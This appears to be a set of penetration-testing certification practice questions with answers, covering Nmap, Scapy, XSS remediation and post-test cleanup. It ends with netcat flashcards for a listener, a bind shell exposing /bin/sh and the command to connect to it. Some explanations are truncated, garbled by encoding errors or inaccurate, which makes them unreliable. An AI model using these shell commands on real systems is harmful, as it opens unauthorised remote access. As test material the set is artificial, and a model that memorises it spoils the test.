A penetration tester ran a simple Python-based scanner. The following is a snippet of the code: portlist: list [int] = [*range (1, 1025)] try; port: object resultList: list [Any] = [] for port in portList: sock = socket.socket (socket.AF_INET, socket.SOCK_STREAM) sock.settimeout (20) result = sock.connect_ex ((remoteSvr, port)) if result == 0: resultList.append (port) sock.close() Which of the following BEST describes why this script triggered a `probable port scan` alert in the organization's IDS? A. sock.settimeout(20) on line 7 caused each next socket to be created every 20 milliseconds. B. *range(1, 1025) on line 1 populated the portList list in numerical order. d C. Line 6 uses socket.SOCK_STREAM instead of socket.SOCK_DGRAM D. The remoteSvr variable has neither been type-hinted nor initialized.
The snippet of code is most likely to have triggered a "probable port scan" alert in the organization's IDS due to: B. *range(1, 1025) on line 1 populated the portList list in numerical order. The script is scanning a range of ports from 1 to 1024, which is the well-known range of ports. Scanning such a broad range of ports in numerical order is likely to be detected by an IDS as a probable port scan.
A security professional wants to test an IoT device by sending an invalid packet to a proprietary service listening on TCP port 3011. Which of the following would allow the security professional to easily and programmatically manipulate the TCP header length and checksum using arbitrary numbers and to observe how the proprietary service responds? A. Nmap B. tcpdump C. Scapy D. hping3
The tool that allows a security professional to programmatically manipulate TCP header length, checksum, and other packet details using arbitrary numbers is: C. Scapy Scapy is a powerful Python library and interactive tool that enables the creation, manipulation, sending, and receiving of network packets. It is often used for network discovery, scanning, and vulnerability testing, and it can be very useful when testing how a proprietary service responds to specifically crafted or invalid packets. Options A, B, and D are valuable tools in the networking and security domains, but Scapy is particularly well-suited for this kind of packet manipulation and analysis.
A penetration tester is cleaning up and covering tracks at the conclusion of a penetration test. Which of the following should the tester be sure to remove from the system? (Choose two.) A. Spawned shells B. Created user accounts C. Server logs D. Administrator accounts E. Reboot system F. ARP cache
The top three actions CompTIA state Remove Shells Remove Tester-Created Accounts Remove Tools
Which of the following tools would be BEST suited to perform a manual web application security assessment? (Choose two.) A. OWASP ZAP B. Nmap C. Nessus D. BeEF E. Hydra F. Burp Suite
The two tools that would be BEST suited to perform a manual web application security assessment are: A. OWASP ZAP (Zed Attack Proxy): OWASP ZAP is specifically designed for web application security testing and is a widely used open-source tool for finding vulnerabilities in web applications. It offers various features such as intercepting and modifying HTTP requests, automated scanners, and active/passive security testing. F. Burp Suite: Burp Suite is a popular web vulnerability scanner and security testing tool that is widely used in the industry. It provides a comprehensive set of tools for web application security testing, including proxy, spider, scanner, intruder, and repeater, among others. While the other tools listed (Nmap, Nessus, BeEF, and Hydra) have their uses in security assessments, they are more focused on network scanning and penetration testing rather than web application security assessments, which makes OWASP ZAP and Burp Suite better choices for this specific
During a code review assessment, a penetration tester finds the following vulnerable code inside one of the web application files: <% String id = request.getParameter("id"); %>Employee ID: <%= id %> Which of the following is the BEST remediation to prevent a vulnerability from being exploited, based on this code? A. Parameterized queries B. Patch application C. Output encoding D. HTML sanitization
This code is vulnerable to injection attacks, where an attacker can manipulate the id parameter to execute arbitrary code on the server or access sensitive data. The best remediation to prevent this vulnerability from being exploited is C. Output encoding. Output encoding involves converting special characters to their corresponding HTML entities, which prevents them from being interpreted as code by the browser. In this case, the id parameter should be encoded before it is displayed on the web page. Option A, parameterized queries, is a remediation technique used to prevent SQL injection attacks, not injection attacks in general. Option B, patch application, is not a remediation technique for injection attacks. It involves applying software patches to fix known vulnerabilities in software. Option D, HTML sanitization, involves removing or modifying potentially malicious code from user input before it is processed by the server. While this technique can be effective in preventing
A penetration tester ran an Nmap scan on an Internet-facing network device with the -F option and found a few open ports. To further enumerate, the tester ran another scan using the following command: nmap -O -A -sS -p- 100.100.100.50 Nmap returned that all 65,535 ports were filtered Which of the following MOST likely occurred on the second scan? A. A firewall or IPS blocked the scan. B. The penetration tester used unsupported flags. C. The edge network device was disconnected. D. The scan returned ICMP echo replies.
When Nmap returns that all 65,535 ports are filtered, it means that the network device or firewall is actively blocking the Nmap scan by not allowing any incoming connections to be established. This is a common security measure to prevent unauthorized access or network reconnaissance. This can be done by a firewall or an Intrusion Prevention System (IPS) which is designed to detect and prevent malicious activity on a network. Option B, unsupported flags, is unlikely as Nmap is a widely used tool and the flags used in the command you provided are commonly used for performing an OS fingerprinting and service detection scan. Option C, The edge network device was disconnected, is unlikely as the response of all ports being filtered suggests that the device is actively responding and blocking the scan. Option D, The scan returned ICMP echo replies, is unlikely as the flags used in the command is for OS fingerprinting and service detection scan which does not use ICMP echo replies.
A penetration tester was able to compromise a server and escalate privileges. Which of the following should the tester perform AFTER concluding the activities on the specified target? (Choose two.) A. Remove the logs from the server. B. Restore the server backup. C. Disable the running services. D. Remove any tools or scripts that were installed. E. Delete any created credentials. F. Reboot the target server.
When a penetration tester concludes activities on a specified target, they should follow ethical guidelines to leave the system in a secure and stable state without tampering with the evidence. Based on these principles, the following actions should be taken: D. Remove any tools or scripts that were installed. E. Delete any created credentials.
An assessor wants to run an Nmap scan as quietly as possible. Which of the following commands will give the LEAST chance of detection? A. nmap ג€"T3 192.168.0.1 B. nmap ג€"P0 192.168.0.1 C. nmap ג€"T0 192.168.0.1 D. nmap ג€"A 192.168.0.1
When attempting to run an Nmap scan that's as stealthy as possible, you would want to avoid aggressive scans and avoid triggering as many alarms or logs as possible. Among the given options: C. nmap -T0 192.168.0.1 The "-T0" flag sets Nmap to its "paranoid" timing template, meaning that it will wait for a long time between sending packets. This makes the scan very slow, but it also makes it less likely to be detected by intrusion detection systems, as the slow scan might not trigger thresholds that are looking for rapid, suspicious scanning activity. The other options provided are not as stealthy: Therefore, option C is the correct answer, as it will give the least chance of detection.
An assessor wants to use Nmap to help map out a stateful firewall rule set. Which of the following scans will the assessor MOST likely run? A. nmap -sA 192.168.0.1/24 B. nmap -sS 192.168.0.1/24 C. nmap -oG 192.168.0.1/24 D. nmap 192.168.0.1/24
When the goal is to map out a stateful firewall rule set, the assessor is likely looking to identify how the firewall responds to different flags in the TCP header. A stateful firewall keeps track of the state of active connections, so understanding its rules requires the use of specific scanning techniques. The command that MOST likely fits this scenario is: A. nmap -sA 192.168.0.1/24 Explanation: -sA: This is the TCP ACK scan option in Nmap. It can be used to map out firewall rule sets, as stateful firewalls may react differently to packets with the ACK flag set. This type of scan can help to understand how the firewall is configured with regards to established connections. The other options are not as suited for mapping a stateful firewall:
In an unprotected network file repository, a penetration tester discovers a text file containing usernames and passwords in cleartext and a spreadsheet containing data for 50 employees, including full names, roles, and serial numbers. The tester realizes some of the passwords in the text file follow the format: <name- serial_number>.Which of the following would be the best action for the tester to take NEXT with this information? A. Create a custom password dictionary as preparation for password spray testing. B. Recommend using a password manager/vault instead of text files to store passwords securely. C. Recommend configuring password complexity rules in all the systems and applications. D. Document the unprotected file repository as a finding in the penetration-testing report.
While all the given options may be relevant at different stages of the penetration testing process, the best action to take NEXT after discovering sensitive information in an unprotected network file repository is to document the finding. Documenting the findings as they are discovered ensures that all relevant information is captured and that the client is provided with accurate and comprehensive details about the security issues identified during the test. Recommendations for improving security, such as using a password manager/vault or configuring password complexity rules, would typically be included in the final report or discussed with the client after the testing is completed. So, the correct answer is: D. Document the unprotected file repository as a finding in the penetration-testing report.
An exploit developer is coding a script that submits a very large number of small requests to a web server until the server is compromised. The script must examine each response received and compare the data to a large number of strings to determine which data to submit next. Which of the following data structures should the exploit developer use to make the string comparison and determination as efficient as possible? A. A list B. A tree C. A dictionary D. An array
While other data structures have their use cases, they are generally not as efficient as dictionaries for this specific task of quick string comparison and determination when dealing with a large number of strings.
A reverse shell is established when the target machine communicates with an attack machine listening on a specific port. To set up a listener on the attack machine, you would use the command
nc -lp 31337
A bind shell is established when a victim system "binds" its shell to a local network port. To achieve this using netcat, you should execute the command
nc -lp 31337 -e /bin/sh" on the victim machine This sets up a listener on the machine on port 31337 and will execute the /bin/sh when another machine connects to its listener on port 31337.
How would an attacker connect to bind shell?
nc 192.168.1.53 31337 to connect to the victim's bind shell.
